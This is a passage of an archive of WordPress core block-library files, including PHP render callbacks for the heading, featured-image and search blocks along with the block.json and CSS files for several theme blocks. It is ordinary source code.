      state.menuOpenedBy[menuClosedOn] = false;
      // Check if the menu is still open or not.
      if (!state.isMenuOpen) {
        if (ctx.modal?.contains(window.document.activeElement)) {
          ctx.previousFocus?.focus();
        }
        ctx.modal = null;
        ctx.previousFocus = null;
        if (ctx.type === 'overlay') {
          document.documentElement.classList.remove('has-modal-open');
        }
      }
    }
  },
  callbacks: {
    initMenu() {
      const ctx = (0,interactivity_namespaceObject.getContext)();
      const {
        ref
      } = (0,interactivity_namespaceObject.getElement)();
      if (state.isMenuOpen) {
        const focusableElements = ref.querySelectorAll(focusableSelectors);
        ctx.modal = ref;
        ctx.firstFocusableElement = focusableElements[0];
        ctx.lastFocusableElement = focusableElements[focusableElements.length - 1];
      }
    },
    focusFirstElement() {
      const {
        ref
      } = (0,interactivity_namespaceObject.getElement)();
      if (state.isMenuOpen) {
        const focusableElements = ref.querySelectorAll(focusableSelectors);
        focusableElements?.[0]?.focus();
      }
    }
  }
}, {
  lock: true
});

heading.php000060400000002425151330427370006660 0ustar00<?php
/**
 * Appending the wp-block-heading to before rendering the stored `core/heading` block contents.
 *
 * @package WordPress
 */

/**
 * Adds a wp-block-heading class to the heading block content.
 *
 * For example, the following block content:
 *  <h2 class="align-left">Hello World</h2>
 *
 * Would be transformed to:
 *  <h2 class="align-left wp-block-heading">Hello World</h2>
 *
 * @since 6.2.0
 *
 * @param array  $attributes Attributes of the block being rendered.
 * @param string $content Content of the block being rendered.
 *
 * @return string The content of the block being rendered.
 */
function block_core_heading_render( $attributes, $content ) {
	if ( ! $content ) {
		return $content;
	}

	$p = new WP_HTML_Tag_Processor( $content );

	$header_tags = array( 'H1', 'H2', 'H3', 'H4', 'H5', 'H6' );
	while ( $p->next_tag() ) {
		if ( in_array( $p->get_tag(), $header_tags, true ) ) {
			$p->add_class( 'wp-block-heading' );
			break;
		}
	}

	return $p->get_updated_html();
}

/**
 * Registers the `core/heading` block on server.
 *
 * @since 6.2.0
 */
function register_block_core_heading() {
	register_block_type_from_metadata(
		__DIR__ . '/heading',
		array(
			'render_callback' => 'block_core_heading_render',
		)
	);
}

add_action( 'init', 'register_block_core_heading' );
site-tagline/editor-rtl.min.css000060400000000104151330427370012506 0ustar00.wp-block-site-tagline__placeholder{border:1px dashed;padding:1em 0}site-tagline/style.min.css000064400000000055151330427370011572 0ustar00.wp-block-site-tagline{box-sizing:border-box}site-tagline/editor-rtl.css000060400000000114151330427370011725 0ustar00.wp-block-site-tagline__placeholder{
  border:1px dashed;
  padding:1em 0;
}site-tagline/block.json000060400000002471151330427370011123 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/site-tagline",
	"title": "Site Tagline",
	"category": "theme",
	"description": "Describe in a few words what the site is about. The tagline can be used in search results or when sharing on social networks even if it’s not displayed in the theme design.",
	"keywords": [ "description" ],
	"textdomain": "default",
	"attributes": {
		"textAlign": {
			"type": "string"
		},
		"level": {
			"type": "number",
			"default": 0
		}
	},
	"example": {},
	"supports": {
		"align": [ "wide", "full" ],
		"html": false,
		"color": {
			"gradients": true,
			"__experimentalDefaultControls": {
				"background": true,
				"text": true
			}
		},
		"spacing": {
			"margin": true,
			"padding": true,
			"__experimentalDefaultControls": {
				"margin": false,
				"padding": false
			}
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalFontStyle": true,
			"__experimentalFontWeight": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"editorStyle": "wp-block-site-tagline-editor"
}
site-tagline/style.css000064400000000062151330427370011006 0ustar00.wp-block-site-tagline{
  box-sizing:border-box;
}site-tagline/style-rtl.min.css000064400000000055151330427370012371 0ustar00.wp-block-site-tagline{box-sizing:border-box}site-tagline/style-rtl.css000064400000000062151330427370011605 0ustar00.wp-block-site-tagline{
  box-sizing:border-box;
}site-tagline/editor.min.css000060400000000104151330427370011707 0ustar00.wp-block-site-tagline__placeholder{border:1px dashed;padding:1em 0}site-tagline/editor.css000060400000000114151330427370011126 0ustar00.wp-block-site-tagline__placeholder{
  border:1px dashed;
  padding:1em 0;
}code/editor.min.css000060400000000044151330427370010237 0ustar00.wp-block-code code{background:none}code/style-rtl.min.css000060400000000211151330427370010704 0ustar00.wp-block-code{box-sizing:border-box}.wp-block-code code{display:block;font-family:inherit;overflow-wrap:break-word;white-space:pre-wrap}code/editor.css000060400000000051151330427370007453 0ustar00.wp-block-code code{
  background:none;
}code/style.min.css000060400000000211151330427370010105 0ustar00.wp-block-code{box-sizing:border-box}.wp-block-code code{display:block;font-family:inherit;overflow-wrap:break-word;white-space:pre-wrap}code/theme-rtl.css000060400000000202151330427370010064 0ustar00.wp-block-code{
  border:1px solid #ccc;
  border-radius:4px;
  font-family:Menlo,Consolas,monaco,monospace;
  padding:.8em 1em;
}code/theme-rtl.min.css000060400000000164151330427370010655 0ustar00.wp-block-code{border:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}code/editor-rtl.min.css000060400000000044151330427370011036 0ustar00.wp-block-code code{background:none}code/block.json000060400000002574151330427370007454 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/code",
	"title": "Code",
	"category": "text",
	"description": "Display code snippets that respect your spacing and tabs.",
	"textdomain": "default",
	"attributes": {
		"content": {
			"type": "rich-text",
			"source": "rich-text",
			"selector": "code",
			"__unstablePreserveWhiteSpace": true
		}
	},
	"supports": {
		"align": [ "wide" ],
		"anchor": true,
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"spacing": {
			"margin": [ "top", "bottom" ],
			"padding": true,
			"__experimentalDefaultControls": {
				"margin": false,
				"padding": false
			}
		},
		"__experimentalBorder": {
			"radius": true,
			"color": true,
			"width": true,
			"style": true,
			"__experimentalDefaultControls": {
				"width": true,
				"color": true
			}
		},
		"color": {
			"text": true,
			"background": true,
			"gradients": true,
			"__experimentalDefaultControls": {
				"background": true,
				"text": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"style": "wp-block-code"
}
code/style-rtl.css000060400000000235151330427370010130 0ustar00.wp-block-code{
  box-sizing:border-box;
}
.wp-block-code code{
  display:block;
  font-family:inherit;
  overflow-wrap:break-word;
  white-space:pre-wrap;
}code/editor-rtl.css000060400000000051151330427370010252 0ustar00.wp-block-code code{
  background:none;
}code/style.css000060400000000235151330427370007331 0ustar00.wp-block-code{
  box-sizing:border-box;
}
.wp-block-code code{
  display:block;
  font-family:inherit;
  overflow-wrap:break-word;
  white-space:pre-wrap;
}code/theme.min.css000060400000000164151330427370010056 0ustar00.wp-block-code{border:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}code/theme.css000060400000000202151330427370007265 0ustar00.wp-block-code{
  border:1px solid #ccc;
  border-radius:4px;
  font-family:Menlo,Consolas,monaco,monospace;
  padding:.8em 1em;
}post-author-name/block.json000060400000002136151330427370011737 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/post-author-name",
	"title": "Author Name",
	"category": "theme",
	"description": "The author name.",
	"textdomain": "default",
	"attributes": {
		"textAlign": {
			"type": "string"
		},
		"isLink": {
			"type": "boolean",
			"default": false
		},
		"linkTarget": {
			"type": "string",
			"default": "_self"
		}
	},
	"usesContext": [ "postType", "postId" ],
	"supports": {
		"html": false,
		"spacing": {
			"margin": true,
			"padding": true
		},
		"color": {
			"gradients": true,
			"link": true,
			"__experimentalDefaultControls": {
				"background": true,
				"text": true,
				"link": true
			}
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	}
}
post-author-name/style.min.css000064400000000061151330427370012405 0ustar00.wp-block-post-author-name{box-sizing:border-box}post-author-name/style.css000064400000000066151330427370011630 0ustar00.wp-block-post-author-name{
  box-sizing:border-box;
}post-author-name/style-rtl.css000064400000000066151330427370012427 0ustar00.wp-block-post-author-name{
  box-sizing:border-box;
}post-author-name/style-rtl.min.css000064400000000061151330427370013204 0ustar00.wp-block-post-author-name{box-sizing:border-box}comments-pagination.php000060400000002257151330427370011240 0ustar00<?php
/**
 * Server-side rendering of the `core/comments-pagination` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/comments-pagination` block on the server.
 *
 * @since 6.0.0
 *
 * @param array  $attributes Block attributes.
 * @param string $content    Block default content.
 *
 * @return string Returns the wrapper for the Comments pagination.
 */
function render_block_core_comments_pagination( $attributes, $content ) {
	if ( empty( trim( $content ) ) ) {
		return '';
	}

	if ( post_password_required() ) {
		return;
	}

	$classes            = ( isset( $attributes['style']['elements']['link']['color']['text'] ) ) ? 'has-link-color' : '';
	$wrapper_attributes = get_block_wrapper_attributes( array( 'class' => $classes ) );

	return sprintf(
		'<div %1$s>%2$s</div>',
		$wrapper_attributes,
		$content
	);
}

/**
 * Registers the `core/comments-pagination` block on the server.
 *
 * @since 6.0.0
 */
function register_block_core_comments_pagination() {
	register_block_type_from_metadata(
		__DIR__ . '/comments-pagination',
		array(
			'render_callback' => 'render_block_core_comments_pagination',
		)
	);
}
add_action( 'init', 'register_block_core_comments_pagination' );
site-title/style.min.css000060400000000063151330427370011263 0ustar00:root :where(.wp-block-site-title a){color:inherit}site-title/style.css000060400000000070151330427370010477 0ustar00:root :where(.wp-block-site-title a){
  color:inherit;
}site-title/editor-rtl.min.css000060400000000206151330427370012207 0ustar00.wp-block-site-title__placeholder{border:1px dashed;padding:1em 0}.editor-styles-wrapper :where(.wp-block-site-title a){color:inherit}site-title/block.json000060400000002745151330427370010625 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/site-title",
	"title": "Site Title",
	"category": "theme",
	"description": "Displays the name of this site. Update the block, and the changes apply everywhere it’s used. This will also appear in the browser title bar and in search results.",
	"textdomain": "default",
	"attributes": {
		"level": {
			"type": "number",
			"default": 1
		},
		"textAlign": {
			"type": "string"
		},
		"isLink": {
			"type": "boolean",
			"default": true
		},
		"linkTarget": {
			"type": "string",
			"default": "_self"
		}
	},
	"example": {
		"viewportWidth": 500
	},
	"supports": {
		"align": [ "wide", "full" ],
		"html": false,
		"color": {
			"gradients": true,
			"link": true,
			"__experimentalDefaultControls": {
				"background": true,
				"text": true,
				"link": true
			}
		},
		"spacing": {
			"padding": true,
			"margin": true,
			"__experimentalDefaultControls": {
				"margin": false,
				"padding": false
			}
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalFontStyle": true,
			"__experimentalFontWeight": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"editorStyle": "wp-block-site-title-editor",
	"style": "wp-block-site-title"
}
site-title/editor.min.css000060400000000206151330427370011410 0ustar00.wp-block-site-title__placeholder{border:1px dashed;padding:1em 0}.editor-styles-wrapper :where(.wp-block-site-title a){color:inherit}site-title/style-rtl.min.css000060400000000063151330427370012062 0ustar00:root :where(.wp-block-site-title a){color:inherit}site-title/style-rtl.css000060400000000070151330427370011276 0ustar00:root :where(.wp-block-site-title a){
  color:inherit;
}site-title/editor-rtl.css000060400000000225151330427370011426 0ustar00.wp-block-site-title__placeholder{
  border:1px dashed;
  padding:1em 0;
}

.editor-styles-wrapper :where(.wp-block-site-title a){
  color:inherit;
}site-title/editor.css000060400000000225151330427370010627 0ustar00.wp-block-site-title__placeholder{
  border:1px dashed;
  padding:1em 0;
}

.editor-styles-wrapper :where(.wp-block-site-title a){
  color:inherit;
}post-featured-image.php000060400000022223151330427370011121 0ustar00<?php
/**
 * Server-side rendering of the `core/post-featured-image` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/post-featured-image` block on the server.
 *
 * @since 5.8.0
 *
 * @param array    $attributes Block attributes.
 * @param string   $content    Block default content.
 * @param WP_Block $block      Block instance.
 * @return string Returns the featured image for the current post.
 */
function render_block_core_post_featured_image( $attributes, $content, $block ) {
	if ( ! isset( $block->context['postId'] ) ) {
		return '';
	}
	$post_ID = $block->context['postId'];

	$is_link        = isset( $attributes['isLink'] ) && $attributes['isLink'];
	$size_slug      = isset( $attributes['sizeSlug'] ) ? $attributes['sizeSlug'] : 'post-thumbnail';
	$attr           = get_block_core_post_featured_image_border_attributes( $attributes );
	$overlay_markup = get_block_core_post_featured_image_overlay_element_markup( $attributes );

	if ( $is_link ) {
		if ( get_the_title( $post_ID ) ) {
			$attr['alt'] = trim( strip_tags( get_the_title( $post_ID ) ) );
		} else {
			$attr['alt'] = sprintf(
				// translators: %d is the post ID.
				__( 'Untitled post %d' ),
				$post_ID
			);
		}
	}

	$extra_styles = '';

	// Aspect ratio with a height set needs to override the default width/height.
	if ( ! empty( $attributes['aspectRatio'] ) ) {
		$extra_styles .= 'width:100%;height:100%;';
	} elseif ( ! empty( $attributes['height'] ) ) {
		$extra_styles .= "height:{$attributes['height']};";
	}

	if ( ! empty( $attributes['scale'] ) ) {
		$extra_styles .= "object-fit:{$attributes['scale']};";
	}
	if ( ! empty( $attributes['style']['shadow'] ) ) {
		$shadow_styles = wp_style_engine_get_styles( array( 'shadow' => $attributes['style']['shadow'] ) );

		if ( ! empty( $shadow_styles['css'] ) ) {
			$extra_styles .= $shadow_styles['css'];
		}
	}

	if ( ! empty( $extra_styles ) ) {
		$attr['style'] = empty( $attr['style'] ) ? $extra_styles : $attr['style'] . $extra_styles;
	}

	$featured_image = get_the_post_thumbnail( $post_ID, $size_slug, $attr );

	// Get the first image from the post.
	if ( $attributes['useFirstImageFromPost'] && ! $featured_image ) {
		$content_post = get_post( $post_ID );
		$content      = $content_post->post_content;
		$processor    = new WP_HTML_Tag_Processor( $content );

		/*
		 * Transfer the image tag from the post into a new text snippet.
		 * Because the HTML API doesn't currently expose a way to extract
		 * HTML substrings this is necessary as a workaround. Of note, this
		 * is different than directly extracting the IMG tag:
		 * - If there are duplicate attributes in the source there will only be one in the output.
		 * - If there are single-quoted or unquoted attributes they will be double-quoted in the output.
		 * - If there are named character references in the attribute values they may be replaced with their direct code points. E.g. `&hellip;` becomes `…`.
		 * In the future there will likely be a mechanism to copy snippets of HTML from
		 * one document into another, via the HTML Processor's `get_outer_html()` or
		 * equivalent. When that happens it would be appropriate to replace this custom
		 * code with that canonical code.
		 */
		if ( $processor->next_tag( 'img' ) ) {
			$tag_html = new WP_HTML_Tag_Processor( '<img>' );
			$tag_html->next_tag();
			foreach ( $processor->get_attribute_names_with_prefix( '' ) as $name ) {
				$tag_html->set_attribute( $name, $processor->get_attribute( $name ) );
			}
			$featured_image = $tag_html->get_updated_html();
		}
	}

	if ( ! $featured_image ) {
		return '';
	}

	if ( $is_link ) {
		$link_target    = $attributes['linkTarget'];
		$rel            = ! empty( $attributes['rel'] ) ? 'rel="' . esc_attr( $attributes['rel'] ) . '"' : '';
		$height         = ! empty( $attributes['height'] ) ? 'style="' . esc_attr( safecss_filter_attr( 'height:' . $attributes['height'] ) ) . '"' : '';
		$featured_image = sprintf(
			'<a href="%1$s" target="%2$s" %3$s %4$s>%5$s%6$s</a>',
			get_the_permalink( $post_ID ),
			esc_attr( $link_target ),
			$rel,
			$height,
			$featured_image,
			$overlay_markup
		);
	} else {
		$featured_image = $featured_image . $overlay_markup;
	}

	$aspect_ratio = ! empty( $attributes['aspectRatio'] )
		? esc_attr( safecss_filter_attr( 'aspect-ratio:' . $attributes['aspectRatio'] ) ) . ';'
		: '';
	$width        = ! empty( $attributes['width'] )
		? esc_attr( safecss_filter_attr( 'width:' . $attributes['width'] ) ) . ';'
		: '';
	$height       = ! empty( $attributes['height'] )
		? esc_attr( safecss_filter_attr( 'height:' . $attributes['height'] ) ) . ';'
		: '';
	if ( ! $height && ! $width && ! $aspect_ratio ) {
		$wrapper_attributes = get_block_wrapper_attributes();
	} else {
		$wrapper_attributes = get_block_wrapper_attributes( array( 'style' => $aspect_ratio . $width . $height ) );
	}
	return "<figure {$wrapper_attributes}>{$featured_image}</figure>";
}

/**
 * Generate markup for the HTML element that will be used for the overlay.
 *
 * @since 6.1.0
 *
 * @param array $attributes Block attributes.
 *
 * @return string HTML markup in string format.
 */
function get_block_core_post_featured_image_overlay_element_markup( $attributes ) {
	$has_dim_background  = isset( $attributes['dimRatio'] ) && $attributes['dimRatio'];
	$has_gradient        = isset( $attributes['gradient'] ) && $attributes['gradient'];
	$has_custom_gradient = isset( $attributes['customGradient'] ) && $attributes['customGradient'];
	$has_solid_overlay   = isset( $attributes['overlayColor'] ) && $attributes['overlayColor'];
	$has_custom_overlay  = isset( $attributes['customOverlayColor'] ) && $attributes['customOverlayColor'];
	$class_names         = array( 'wp-block-post-featured-image__overlay' );
	$styles              = array();

	if ( ! $has_dim_background ) {
		return '';
	}

	// Apply border classes and styles.
	$border_attributes = get_block_core_post_featured_image_border_attributes( $attributes );

	if ( ! empty( $border_attributes['class'] ) ) {
		$class_names[] = $border_attributes['class'];
	}

	if ( ! empty( $border_attributes['style'] ) ) {
		$styles[] = $border_attributes['style'];
	}

	// Apply overlay and gradient classes.
	if ( $has_dim_background ) {
		$class_names[] = 'has-background-dim';
		$class_names[] = "has-background-dim-{$attributes['dimRatio']}";
	}

	if ( $has_solid_overlay ) {
		$class_names[] = "has-{$attributes['overlayColor']}-background-color";
	}

	if ( $has_gradient || $has_custom_gradient ) {
		$class_names[] = 'has-background-gradient';
	}

	if ( $has_gradient ) {
		$class_names[] = "has-{$attributes['gradient']}-gradient-background";
	}

	// Apply background styles.
	if ( $has_custom_gradient ) {
		$styles[] = sprintf( 'background-image: %s;', $attributes['customGradient'] );
	}

	if ( $has_custom_overlay ) {
		$styles[] = sprintf( 'background-color: %s;', $attributes['customOverlayColor'] );
	}

	return sprintf(
		'<span class="%s" style="%s" aria-hidden="true"></span>',
		esc_attr( implode( ' ', $class_names ) ),
		esc_attr( safecss_filter_attr( implode( ' ', $styles ) ) )
	);
}

/**
 * Generates class names and styles to apply the border support styles for
 * the Post Featured Image block.
 *
 * @since 6.1.0
 *
 * @param array $attributes The block attributes.
 * @return array The border-related classnames and styles for the block.
 */
function get_block_core_post_featured_image_border_attributes( $attributes ) {
	$border_styles = array();
	$sides         = array( 'top', 'right', 'bottom', 'left' );

	// Border radius.
	if ( isset( $attributes['style']['border']['radius'] ) ) {
		$border_styles['radius'] = $attributes['style']['border']['radius'];
	}

	// Border style.
	if ( isset( $attributes['style']['border']['style'] ) ) {
		$border_styles['style'] = $attributes['style']['border']['style'];
	}

	// Border width.
	if ( isset( $attributes['style']['border']['width'] ) ) {
		$border_styles['width'] = $attributes['style']['border']['width'];
	}

	// Border color.
	$preset_color           = array_key_exists( 'borderColor', $attributes ) ? "var:preset|color|{$attributes['borderColor']}" : null;
	$custom_color           = $attributes['style']['border']['color'] ?? null;
	$border_styles['color'] = $preset_color ? $preset_color : $custom_color;

	// Individual border styles e.g. top, left etc.
	foreach ( $sides as $side ) {
		$border                 = $attributes['style']['border'][ $side ] ?? null;
		$border_styles[ $side ] = array(
			'color' => isset( $border['color'] ) ? $border['color'] : null,
			'style' => isset( $border['style'] ) ? $border['style'] : null,
			'width' => isset( $border['width'] ) ? $border['width'] : null,
		);
	}

	$styles     = wp_style_engine_get_styles( array( 'border' => $border_styles ) );
	$attributes = array();
	if ( ! empty( $styles['classnames'] ) ) {
		$attributes['class'] = $styles['classnames'];
	}
	if ( ! empty( $styles['css'] ) ) {
		$attributes['style'] = $styles['css'];
	}
	return $attributes;
}

/**
 * Registers the `core/post-featured-image` block on the server.
 *
 * @since 5.8.0
 */
function register_block_core_post_featured_image() {
	register_block_type_from_metadata(
		__DIR__ . '/post-featured-image',
		array(
			'render_callback' => 'render_block_core_post_featured_image',
		)
	);
}
add_action( 'init', 'register_block_core_post_featured_image' );
search.php000060400000055740151330427370006536 0ustar00<?php
/**
 * Server-side rendering of the `core/search` block.
 *
 * @package WordPress
 */

/**
 * Dynamically renders the `core/search` block.
 *
 * @since 6.3.0 Using block.json `viewScript` to register script, and update `view_script_handles()` only when needed.
 *
 * @param array    $attributes The block attributes.
 * @param string   $content    The saved content.
 * @param WP_Block $block      The parsed block.
 *
 * @return string The search block markup.
 */
function render_block_core_search( $attributes ) {
	// Older versions of the Search block defaulted the label and buttonText
	// attributes to `__( 'Search' )` meaning that many posts contain `<!--
	// wp:search /-->`. Support these by defaulting an undefined label and
	// buttonText to `__( 'Search' )`.
	$attributes = wp_parse_args(
		$attributes,
		array(
			'label'      => __( 'Search' ),
			'buttonText' => __( 'Search' ),
		)
	);

	$input_id            = wp_unique_id( 'wp-block-search__input-' );
	$classnames          = classnames_for_block_core_search( $attributes );
	$show_label          = ( ! empty( $attributes['showLabel'] ) ) ? true : false;
	$use_icon_button     = ( ! empty( $attributes['buttonUseIcon'] ) ) ? true : false;
	$show_button         = ( ! empty( $attributes['buttonPosition'] ) && 'no-button' === $attributes['buttonPosition'] ) ? false : true;
	$button_position     = $show_button ? $attributes['buttonPosition'] : null;
	$query_params        = ( ! empty( $attributes['query'] ) ) ? $attributes['query'] : array();
	$button              = '';
	$query_params_markup = '';
	$inline_styles       = styles_for_block_core_search( $attributes );
	$color_classes       = get_color_classes_for_block_core_search( $attributes );
	$typography_classes  = get_typography_classes_for_block_core_search( $attributes );
	$is_button_inside    = ! empty( $attributes['buttonPosition'] ) &&
		'button-inside' === $attributes['buttonPosition'];
	// Border color classes need to be applied to the elements that have a border color.
	$border_color_classes = get_border_color_classes_for_block_core_search( $attributes );
	// This variable is a constant and its value is always false at this moment.
	// It is defined this way because some values depend on it, in case it changes in the future.
	$open_by_default = false;

	$label_inner_html = empty( $attributes['label'] ) ? __( 'Search' ) : wp_kses_post( $attributes['label'] );
	$label            = new WP_HTML_Tag_Processor( sprintf( '<label %1$s>%2$s</label>', $inline_styles['label'], $label_inner_html ) );
	if ( $label->next_tag() ) {
		$label->set_attribute( 'for', $input_id );
		$label->add_class( 'wp-block-search__label' );
		if ( $show_label && ! empty( $attributes['label'] ) ) {
			if ( ! empty( $typography_classes ) ) {
				$label->add_class( $typography_classes );
			}
		} else {
			$label->add_class( 'screen-reader-text' );
		}
	}

	$input         = new WP_HTML_Tag_Processor( sprintf( '<input type="search" name="s" required %s/>', $inline_styles['input'] ) );
	$input_classes = array( 'wp-block-search__input' );
	if ( ! $is_button_inside && ! empty( $border_color_classes ) ) {
		$input_classes[] = $border_color_classes;
	}
	if ( ! empty( $typography_classes ) ) {
		$input_classes[] = $typography_classes;
	}
	if ( $input->next_tag() ) {
		$input->add_class( implode( ' ', $input_classes ) );
		$input->set_attribute( 'id', $input_id );
		$input->set_attribute( 'value', get_search_query() );
		$input->set_attribute( 'placeholder', $attributes['placeholder'] );

		// If it's interactive, enqueue the script module and add the directives.
		$is_expandable_searchfield = 'button-only' === $button_position;
		if ( $is_expandable_searchfield ) {
			$suffix = wp_scripts_get_suffix();
			if ( defined( 'IS_GUTENBERG_PLUGIN' ) && IS_GUTENBERG_PLUGIN ) {
				$module_url = gutenberg_url( '/build/interactivity/search.min.js' );
			}

			wp_register_script_module(
				'@wordpress/block-library/search',
				isset( $module_url ) ? $module_url : includes_url( "blocks/search/view{$suffix}.js" ),
				array( '@wordpress/interactivity' ),
				defined( 'GUTENBERG_VERSION' ) ? GUTENBERG_VERSION : get_bloginfo( 'version' )
			);
			wp_enqueue_script_module( '@wordpress/block-library/search' );

			$input->set_attribute( 'data-wp-bind--aria-hidden', '!context.isSearchInputVisible' );
			$input->set_attribute( 'data-wp-bind--tabindex', 'state.tabindex' );

			// Adding these attributes manually is needed until the Interactivity API
			// SSR logic is added to core.
			$input->set_attribute( 'aria-hidden', 'true' );
			$input->set_attribute( 'tabindex', '-1' );
		}
	}

	if ( count( $query_params ) > 0 ) {
		foreach ( $query_params as $param => $value ) {
			$query_params_markup .= sprintf(
				'<input type="hidden" name="%s" value="%s" />',
				esc_attr( $param ),
				esc_attr( $value )
			);
		}
	}

	if ( $show_button ) {
		$button_classes         = array( 'wp-block-search__button' );
		$button_internal_markup = '';
		if ( ! empty( $color_classes ) ) {
			$button_classes[] = $color_classes;
		}
		if ( ! empty( $typography_classes ) ) {
			$button_classes[] = $typography_classes;
		}

		if ( ! $is_button_inside && ! empty( $border_color_classes ) ) {
			$button_classes[] = $border_color_classes;
		}
		if ( ! $use_icon_button ) {
			if ( ! empty( $attributes['buttonText'] ) ) {
				$button_internal_markup = wp_kses_post( $attributes['buttonText'] );
			}
		} else {
			$button_classes[]       = 'has-icon';
			$button_internal_markup =
				'<svg class="search-icon" viewBox="0 0 24 24" width="24" height="24">
					<path d="M13 5c-3.3 0-6 2.7-6 6 0 1.4.5 2.7 1.3 3.7l-3.8 3.8 1.1 1.1 3.8-3.8c1 .8 2.3 1.3 3.7 1.3 3.3 0 6-2.7 6-6S16.3 5 13 5zm0 10.5c-2.5 0-4.5-2-4.5-4.5s2-4.5 4.5-4.5 4.5 2 4.5 4.5-2 4.5-4.5 4.5z"></path>
				</svg>';
		}

		// Include the button element class.
		$button_classes[] = wp_theme_get_element_class_name( 'button' );
		$button           = new WP_HTML_Tag_Processor( sprintf( '<button type="submit" %s>%s</button>', $inline_styles['button'], $button_internal_markup ) );

		if ( $button->next_tag() ) {
			$button->add_class( implode( ' ', $button_classes ) );
			if ( 'button-only' === $attributes['buttonPosition'] ) {
				$button->set_attribute( 'data-wp-bind--aria-label', 'state.ariaLabel' );
				$button->set_attribute( 'data-wp-bind--aria-controls', 'state.ariaControls' );
				$button->set_attribute( 'data-wp-bind--aria-expanded', 'context.isSearchInputVisible' );
				$button->set_attribute( 'data-wp-bind--type', 'state.type' );
				$button->set_attribute( 'data-wp-on--click', 'actions.openSearchInput' );

				// Adding these attributes manually is needed until the Interactivity
				// API SSR logic is added to core.
				$button->set_attribute( 'aria-label', __( 'Expand search field' ) );
				$button->set_attribute( 'aria-controls', 'wp-block-search__input-' . $input_id );
				$button->set_attribute( 'aria-expanded', 'false' );
				$button->set_attribute( 'type', 'button' );
			} else {
				$button->set_attribute( 'aria-label', wp_strip_all_tags( $attributes['buttonText'] ) );
			}
		}
	}

	$field_markup_classes = $is_button_inside ? $border_color_classes : '';
	$field_markup         = sprintf(
		'<div class="wp-block-search__inside-wrapper %s" %s>%s</div>',
		esc_attr( $field_markup_classes ),
		$inline_styles['wrapper'],
		$input . $query_params_markup . $button
	);
	$wrapper_attributes   = get_block_wrapper_attributes(
		array( 'class' => $classnames )
	);
	$form_directives      = '';

	// If it's interactive, add the directives.
	if ( $is_expandable_searchfield ) {
		$aria_label_expanded  = __( 'Submit Search' );
		$aria_label_collapsed = __( 'Expand search field' );
		$form_context         = wp_interactivity_data_wp_context(
			array(
				'isSearchInputVisible' => $open_by_default,
				'inputId'              => $input_id,
				'ariaLabelExpanded'    => $aria_label_expanded,
				'ariaLabelCollapsed'   => $aria_label_collapsed,
			)
		);
		$form_directives      = '
		 data-wp-interactive="core/search"'
		. $form_context .
		'data-wp-class--wp-block-search__searchfield-hidden="!context.isSearchInputVisible"
		 data-wp-on-async--keydown="actions.handleSearchKeydown"
		 data-wp-on-async--focusout="actions.handleSearchFocusout"
		';
	}

	return sprintf(
		'<form role="search" method="get" action="%1s" %2s %3s>%4s</form>',
		esc_url( home_url( '/' ) ),
		$wrapper_attributes,
		$form_directives,
		$label . $field_markup
	);
}

/**
 * Registers the `core/search` block on the server.
 *
 * @since 5.2.0
 */
function register_block_core_search() {
	register_block_type_from_metadata(
		__DIR__ . '/search',
		array(
			'render_callback' => 'render_block_core_search',
		)
	);
}
add_action( 'init', 'register_block_core_search' );

/**
 * Builds the correct top level classnames for the 'core/search' block.
 *
 * @since 5.6.0
 *
 * @param array $attributes The block attributes.
 *
 * @return string The classnames used in the block.
 */
function classnames_for_block_core_search( $attributes ) {
	$classnames = array();

	if ( ! empty( $attributes['buttonPosition'] ) ) {
		if ( 'button-inside' === $attributes['buttonPosition'] ) {
			$classnames[] = 'wp-block-search__button-inside';
		}

		if ( 'button-outside' === $attributes['buttonPosition'] ) {
			$classnames[] = 'wp-block-search__button-outside';
		}

		if ( 'no-button' === $attributes['buttonPosition'] ) {
			$classnames[] = 'wp-block-search__no-button';
		}

		if ( 'button-only' === $attributes['buttonPosition'] ) {
			$classnames[] = 'wp-block-search__button-only wp-block-search__searchfield-hidden';
		}
	}

	if ( isset( $attributes['buttonUseIcon'] ) ) {
		if ( ! empty( $attributes['buttonPosition'] ) && 'no-button' !== $attributes['buttonPosition'] ) {
			if ( $attributes['buttonUseIcon'] ) {
				$classnames[] = 'wp-block-search__icon-button';
			} else {
				$classnames[] = 'wp-block-search__text-button';
			}
		}
	}

	return implode( ' ', $classnames );
}

/**
 * This generates a CSS rule for the given border property and side if provided.
 * Based on whether the Search block is configured to display the button inside
 * or not, the generated rule is injected into the appropriate collection of
 * styles for later application in the block's markup.
 *
 * @since 6.1.0
 *
 * @param array  $attributes     The block attributes.
